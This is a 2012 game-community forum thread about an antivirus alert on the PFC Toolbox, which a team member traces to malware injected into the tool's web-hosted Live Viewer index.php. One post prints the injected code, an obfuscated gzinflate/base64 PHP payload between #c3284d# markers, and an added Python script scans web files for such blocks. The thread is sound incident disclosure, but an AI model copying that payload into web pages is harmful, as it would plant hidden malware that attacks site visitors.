Peterthomson Technician Fifth Grade

 Age: 35 Gender: Joined: Oct 20, 2011 Posts: 13 Location: France / Lille

Posted: Thu Jun 14, 2012 9:10 pm Post subject: Problem with the toolbox
Hello friends,
Since today I have a problem that I have never had before. As always, I opened the toolbox to join the server; but after the end of a map (so during the loading of the next) my screen brought me back to the desk.
A window of my anti-malware (I don't know the correct word in English) "Bitdefender" was opened and it was written that it had stopped a malware, apparently from the toolbox. It happened twice this afternoon. This is my screen:
What do you think? Is it really coming from the toolbox? What have I to do? Thanks for your help
Peterthomson 

Peterthomson Technician Fifth Grade
Posted: Sat Jun 16, 2012 1:03 pm Post subject: Toolbox' problem
Hum, it seems that the problem has disappeared. Very strange 

Peterthomson Technician Fifth Grade
Posted: Sat Jun 16, 2012 6:46 pm Post subject: Trojan
Indeed it's quite disturbing, hope my computer isn't affected... I've no confidential data but a trojan can take control of our computer to use it against another (the hacker protects its identity), for example. This night I'll do a complete check with Bitdefender, although I think it won't be efficient...
But, this is quite surprising that I'm the only user of the toolbox who has this problem.
EDIT: I've checked by both opening the toolbox and Bitdefender. On Bitdefender, you can see the number of "infected data". When I looked at it, there were 17 infected files! Then I went on the toolbox, I pressed on "refresh", I went back on Bitdefender and the number of infected files was 18! Yet, I've no more windows of Bitdefender like in the screen I did, and put on this subject.
To prevent any kind of possible damage, I prefer to remove the Toolbox from my computer.

Peterthomson Technician Fifth Grade
Posted: Sun Jun 17, 2012 3:45 pm Post subject:
Indeed an answer would be nice, but I don't think PFC is doing illegal things, PFC has always been involved in the fight against hackers... Hope we'll have a response soon

Grabbi -=PFC=- MappingTeam

 Age: 36 Gender: Joined: June 17, 2007 Posts: 1523 Location: Germany / Netherlands
Posted: Sun Jun 17, 2012 4:30 pm Post subject:
had simply no time to respond yet (since have a lack of manpower atm on several projects like FHC and webshop)
Similar message I got mailed about our website with Antivir I think it was.
End of message the Antivir developers visited our website scanned it and found that their program is showing false alert. Super!
Am running Eset Nod32 and all is fine with Toolbox Download.
Same is when Patte is compiling a new version of our Toolbox with Visual Studio 2010 Ultimate his computer scans as well all content he up/downloads and our server over which we distribute the Toolbox does same again to make sure there's nothing wrong (malware, virus etc).
Once again, sry for late answer but we are running on low reinforcements atm!
IF there would be something wrong we had 50000+ problems, cause that is the download counter atm for the Toolbox (well 64 ppl would be enough (24/7) impov.)
The Toolbox is also available at CT!!! major German IT news magazine (they also scan the content of course!)
http://www.heise.de/download/pfc-toolbox-for-forgotten-hope-1172063.html
Greetz
Grabbi
PS: @Peter
Maybe you got victim by a Trojan which is spreading out on your hdds affecting several programs now ( such as Toolbox etc)
Go here http://www.eset.com/home/products/online-scanner/
and try ESET's Free Online Scanner. It scans your computer for threats easily and effectively.

Peterthomson Technician Fifth Grade
Posted: Sun Jun 17, 2012 4:42 pm Post subject:
Hi Grabbi,
Thanks for answering, and I understand you are busy. Well, I hope this is a false alert! I will re-download the toolbox soon, maybe the problem will have disappeared.

Grabbi -=PFC=- MappingTeam
Posted: Mon Jun 18, 2012 10:41 pm Post subject:
ok tnx to Napoleon who wrote a PM to me and posted as well in Shout box I could locate a malware code in the INDEX.php of the LIVE VIEWER which the Toolbox is calling for as soon as it is clicked upon. So it's not the Toolbox itself, it's an external website part we setup for Toolbox services NO ONE has on harddisk drive.
I deleted that crap and replaced it with the original file after detecting.
Question is:
How is someone able to access our web server and contaminate the index.php and reame.html (which is totally useless) from the Toolbox live viewer!
We'll investigate this and secured access!
All fine & safe now and tnx to Napoleon!

Peterthomson Technician Fifth Grade
Posted: Tue Jun 19, 2012 1:15 pm Post subject:
Great! Thanks Grabbi and thanks to Napoleon.
The number of hacking attempts is terrible... The web becomes more dangerous than the jungle
Unfortunately I can't help you to investigate, I have no knowledge about this!

Grabbi -=PFC=- MappingTeam
Posted: Tue Jun 19, 2012 1:23 pm Post subject:
Quote:
#c3284d#
echo(gzinflate(base64_decode("bVNNj5swEP0ttdSVKZPEYxsDZd0eov6CHqMcWD4WtFkgwG60i va/d2ygvfSArPHMvHnveXicirEd5h/z+HG/2rIv3l6rbt4XY5XP1a9L5SLOBhZk130+DFVXHpv2UvJryOjus8jnouHXW3Bv7E6gPERZbVk99q8sc5BPxVTaYeznfv4Yqp3cOp7y23NwnyZ7Omd1aHnz8FAHPzk7Nvl4ZCHry4oF3xnLKntru7K/nVj1nl/YOevsCRVIAUoI0FpDmoJUGpSMQQsNiIJiCagS0LGhWIOkO6UTn9cC4gQwoWYCQSFBygRkiqAVVQsEQ2A6Ah0Zh41S+iqNDst4bKWWU8eQ6qU3dlUx8aKsIQa SJiWQUoQERUOp1tCF8UFKlZiQBFKi3ThASqooXkhtYyjtWFB65aTSVRCRUm6EEyoiip0f6 V8wYqUiYmWcH7gNFolv9tnVrTRZsDSJEcLLd3ZgoshAs5i5GoB073mbRRNKn9788dR8+z+v3bR1Nq5ZXIhubm7dUohN5maCWN5R0ZxNllgfjODJYyfDEfmPLCP9I0uy16l w+3LO2povu7Tf1jyo+5G31uzkDt2X7TASYfvFStrUNgyD+4ttM9rSaQp/z2PbPZ/qM+9OL +cDb7/y5lsThBjQb1DxaaLj8/Gw/k5/AA==")));
#/c3284d#
This is the malware code and when you google it you'll find many many affected websites past days.
index.php's and template files (tpl) are contaminated with this code snippet above on other websites. Good that no damage has been done to us cause attacker just had very very limited access to our webfolder.
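
A defender-side check for the injection described in this thread, as an added example that is not part of the original posts or PFC's own code: it walks a web root and flags `#xxxxxx# ... #/xxxxxx#` marker blocks like the one quoted above. Matching any six-hex-digit marker (not only `c3284d`), the extension list and the function names are assumptions; the sample files are constructed and carry a harmless placeholder payload.

```python
import os
import re
import tempfile

# Assumed extension list: the thread names index.php, an .html file and .tpl templates.
SCAN_EXT = {".php", ".tpl", ".html", ".htm"}
# Assumption: an injected block is wrapped in "#<6 hex>#" ... "#/<same 6 hex>#".
MARKED_BLOCK = re.compile(rb"#([0-9a-f]{6})#(.*?)#/\1#", re.DOTALL | re.IGNORECASE)
# The quoted snippet unpacks its payload through this call chain.
DECODE_CHAIN = re.compile(rb"gzinflate\s*\(\s*base64_decode\s*\(", re.IGNORECASE)

def scan_file(path):
    """Return one finding (dict) per marker block found in the file."""
    with open(path, "rb") as fh:
        data = fh.read()
    findings = []
    for m in MARKED_BLOCK.finditer(data):
        findings.append({
            "path": path, "marker": m.group(1).decode().lower(),
            "line": data.count(b"\n", 0, m.start()) + 1,
            "decode_chain": bool(DECODE_CHAIN.search(m.group(2))),
        })
    return findings

def scan_tree(root):
    """Walk a web root and scan every file with a listed extension."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if os.path.splitext(name)[1].lower() in SCAN_EXT:
                findings.extend(scan_file(os.path.join(dirpath, name)))
    return findings

def demo():
    """Build a constructed web root and scan it; payload is a placeholder string."""
    injected = (b"<?php\n#c3284d#\n"
                b'echo(gzinflate(base64_decode("Q09OU1RSVUNURUQ=")));\n'
                b"#/c3284d#\n?>\n<html>live viewer</html>\n")
    clean = b"<div style='color:#c3284d'>template</div>\n"  # colour code, not a marker
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("index.php", injected), ("page.tpl", clean)):
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
        return [(os.path.basename(f["path"]), f["marker"], f["line"],
                 f["decode_chain"]) for f in scan_tree(root)]

if __name__ == "__main__":
    print(demo())
```

Run `scan_tree()` against a copy of the web folder; a hit only locates the block, so the file should still be restored from a known-good original, as was done here.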

Peterthomson Technician Fifth Grade
Posted: Tue Jun 19, 2012 2:38 pm Post subject:
PFC is in war against hackers 